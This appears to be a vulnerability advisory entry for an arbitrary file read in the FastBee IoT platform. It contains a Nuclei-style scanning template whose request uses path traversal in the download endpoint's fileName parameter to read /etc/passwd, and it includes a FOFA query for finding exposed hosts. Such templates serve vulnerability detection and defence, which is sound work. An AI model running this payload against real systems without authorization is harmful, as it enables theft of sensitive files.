漏洞描述
Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
fastbee-arbitrary-file-read: FastBee - Local File Inclusion
PoC代码[已公开]
id: fastbee-arbitrary-file-read
info:
name: FastBee - Local File Inclusion
author: s4e-io
severity: high
description: |
Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
reference:
- https://blog.csdn.net/weixin_43167326/article/details/141806542
metadata:
verified: true
max-request: 1
vendor: fastbee
product: fastbee
fofa-query: "fastbee"
tags: fastbee,iot,lfi,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>FastBee")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: word
part: content_type
words:
- 'application/octet-stream'
- type: status
status:
- 200
# digest: 4b0a00483046022100c7e8dff98cb9473148a78491c989c0fe2bbd6d01bfc6e58ff8d10603b22c25b7022100bb117dbc5ecca252f5fca7d7d2d8444d5246472b157b3519bb3d2331aa311b4a:922c64590222798bb761d5b6d8e72950